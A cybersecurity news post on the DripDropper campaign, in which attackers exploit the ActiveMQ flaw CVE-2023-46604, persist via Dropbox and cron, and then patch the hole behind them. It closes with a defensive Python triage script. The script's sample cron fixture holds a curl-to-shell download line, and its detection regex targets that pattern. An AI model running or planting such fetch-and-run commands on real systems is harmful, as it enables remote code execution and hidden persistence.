Hackers Exploit and Then Patch ActiveMQ Flaw to Hide Malware Campaign
- Cyber Jack
- Aug 19
- 2 min read
In a campaign that reads like a playbook for next-generation cybercrime, threat actors are exploiting a two-year-old Apache ActiveMQ flaw to compromise Linux cloud environments, deploy custom malware, and then patch the very hole they used to get in. The unusual tactic effectively locks out rival attackers and reduces the chance of discovery.
Researchers at Red Canary uncovered the activity, observing intrusions that start with exploitation of CVE-2023-46604, a critical remote code execution vulnerability in ActiveMQ rated at the maximum CVSS score of 10.0. Although Apache fixed the bug in October 2023, attackers continue to exploit it widely, with payloads ranging from ransomware to rootkits. In this case, the attackers added their own twist.
DripDropper: A Downloader That Hides in Plain Sight
Once inside, the intruders altered SSH configurations to allow root login and dropped a previously undocumented downloader called DripDropper. Packaged as a PyInstaller ELF binary, the tool resists analysis by requiring a password before execution. Communication is funneled through Dropbox, a tactic increasingly favored by attackers who want to blend malicious traffic with normal enterprise activity.
DripDropper fetches two additional components. One monitors processes, requests new instructions from Dropbox, and persists by modifying job files in the hourly, daily, weekly, and monthly cron directories. The other reinforces access by further tweaking the SSH configuration and establishing a secondary Dropbox-based control channel.
Patching the Door Behind Them
The most striking step comes at the end. After entrenching themselves, the attackers download the fixed ActiveMQ libraries for CVE-2023-46604 from Apache's official Maven repository and install them in place of the vulnerable ones, closing the hole they came in through. Red Canary researchers noted that “patching the vulnerability does not disrupt their operations as they already established other persistence mechanisms for continued access.”
By fixing the bug, the attackers simultaneously prevent other criminals from piggybacking on the same flaw and obscure the original intrusion vector from defenders.
A Known but Rare Tradecraft
While rare, the method is not unprecedented. Last month, France’s national cybersecurity agency ANSSI reported a China-linked initial access broker using a similar strategy, patching exploited flaws to preserve exclusive control of compromised systems.
Expert Perspective
Ensar Seker, CISO at SOCRadar, called the campaign “a markedly elevated form of threat actor tradecraft.” He added, “Exploiting CVE-2023-46604 in ActiveMQ to gain entry is already alarming but what really makes this stand out is the attacker patching the vulnerability after establishing access. By fixing the very hole they exploited, they lock out other intruders and obscure the original attack vector, diminishing detection chances and confusing defenders.”
From there, attackers leverage Sliver implants, Cloudflare Tunnels, and SSH misconfigurations to maintain deep and resilient footholds. The approach highlights a growing sophistication in attacker operations where offense and defense blur.
Lessons for Defenders
For enterprises, the episode underscores a familiar but urgent warning: apply patches quickly, expose services such as ActiveMQ only to trusted IP ranges or over a VPN, and monitor cloud and host logs for irregular behavior. Indicators such as unexpected Dropbox connections, modified SSH settings, or cron job tampering should trigger immediate investigation. One caveat follows directly from this campaign: an ActiveMQ instance that now reports a fixed version is not evidence that it was never compromised, so the persistence artifacts, not the patch level, are what tell defenders whether a host is clean.
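The three host-level indicators named above (root login enabled in sshd_config, tampered job files under the cron directories, and Dropbox traffic from processes that have no business talking to Dropbox) can be triaged with a short script. The following is an added example written for this page, not code from Red Canary or the article; the file paths, the log line format, the process allowlist and every sample input are constructed here for illustration and are not artifacts from the campaign.

```python
"""Triage checks for the DripDropper-style indicators discussed above.

Added example. All inputs are constructed samples embedded below so the
script runs offline; swap in real file contents and logs on a host.
"""
import re
from dataclasses import dataclass

# Cron directories whose job files the persistence component is reported to modify.
CRON_DIRS = ("/etc/cron.hourly/", "/etc/cron.daily/", "/etc/cron.weekly/", "/etc/cron.monthly/")
# Dropbox domains (the C2 channel used by the downloader); matched as a suffix below.
DROPBOX_DOMAINS = ("dropbox.com", "dropboxapi.com", "dropboxusercontent.com")
# Shell job that fetches something with curl/wget and pipes it straight into a shell.
FETCH_PIPE = re.compile(r"\b(curl|wget)\b[^\n|]*\|\s*(ba|da)?sh\b")
# Constructed log format: "<ts> host=<h> proc=<path> dst=<host>:<port>" (assumption, not a real product format).
LOG_RE = re.compile(r"^(?P<ts>\S+) host=(?P<host>\S+) proc=(?P<proc>\S+) dst=(?P<dst>[^:\s]+):(?P<port>\d+)")

# --- constructed sample inputs -------------------------------------------------
SAMPLE_SSHD_CONFIG = """\
# /etc/ssh/sshd_config (constructed sample)
Port 22
PermitRootLogin yes
PasswordAuthentication yes
#PermitRootLogin no
"""
SAMPLE_CRON_FILES = {
    "/etc/cron.daily/logrotate": "#!/bin/sh\n/usr/sbin/logrotate /etc/logrotate.conf\n",
    "/etc/cron.hourly/0anacron": "#!/bin/sh\ncurl -s https://content.dropboxapi.com/2/files/download | sh\n",
    "/etc/cron.weekly/man-db": "#!/bin/sh\n/usr/bin/mandb --quiet\n",
}
SAMPLE_NET_LOG = """\
2025-08-12T10:14:03Z host=mq-01 proc=/usr/bin/java dst=db-01.internal:5432
2025-08-12T10:14:09Z host=mq-01 proc=/tmp/.cache/dd dst=api.dropboxapi.com:443
2025-08-12T10:15:41Z host=laptop-7 proc=/opt/dropbox/dropbox dst=api.dropboxapi.com:443
"""


@dataclass
class Finding:
    source: str
    detail: str


def is_dropbox(host: str) -> bool:
    """True for a Dropbox domain or any subdomain of one (avoids matching 'notdropbox.com')."""
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in DROPBOX_DOMAINS)


def check_sshd_config(text: str) -> list[Finding]:
    """Flag sshd directives that open root login. Comments are ignored; sshd applies the
    first occurrence of a directive, so every active occurrence is reported for review."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue
        key, val = parts[0].lower(), parts[1].strip().lower()
        if key == "permitrootlogin" and val not in ("no", "prohibit-password"):
            findings.append(Finding("sshd_config", f"line {n}: PermitRootLogin {val}"))
        elif key == "permitemptypasswords" and val == "yes":
            findings.append(Finding("sshd_config", f"line {n}: PermitEmptyPasswords yes"))
    return findings


def check_cron_dirs(files: dict[str, str]) -> list[Finding]:
    """Given {path: contents}, flag jobs in the cron directories that contact Dropbox
    or pipe a download into a shell. One finding per suspicious file."""
    findings = []
    for path, body in files.items():
        if not path.startswith(CRON_DIRS):
            continue
        reasons = []
        if any(is_dropbox(h) for h in re.findall(r"https?://([^/\s]+)", body)):
            reasons.append("job contacts Dropbox")
        if FETCH_PIPE.search(body):
            reasons.append("job pipes a download into a shell")
        if reasons:
            findings.append(Finding(path, "; ".join(reasons)))
    return findings


def check_net_log(text: str, allowed_procs=("/opt/dropbox/dropbox",)) -> list[Finding]:
    """Flag Dropbox connections from any process not on the allowlist of known sync clients."""
    findings = []
    for raw in text.splitlines():
        m = LOG_RE.match(raw)
        if not m:
            continue
        if is_dropbox(m["dst"]) and m["proc"] not in allowed_procs:
            findings.append(Finding(f"{m['host']} net", f"{m['proc']} -> {m['dst']}:{m['port']}"))
    return findings


def triage() -> list[Finding]:
    """Run all three checks over the constructed samples."""
    return (check_sshd_config(SAMPLE_SSHD_CONFIG)
            + check_cron_dirs(SAMPLE_CRON_FILES)
            + check_net_log(SAMPLE_NET_LOG))


if __name__ == "__main__":
    for f in triage():
        print(f"[{f.source}] {f.detail}")
```

On the samples this reports three findings: the active `PermitRootLogin yes` line (the commented-out `no` is ignored), the hourly job that pulls a Dropbox download into `sh`, and the Dropbox connection from an unexpected binary on the broker host while the desktop sync client on the laptop is allowlisted. The process allowlist is the knob that keeps the network check useful in environments where Dropbox is legitimately in use.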
The DripDropper campaign shows that adversaries are not only exploiting vulnerabilities but also racing to close them—on their terms.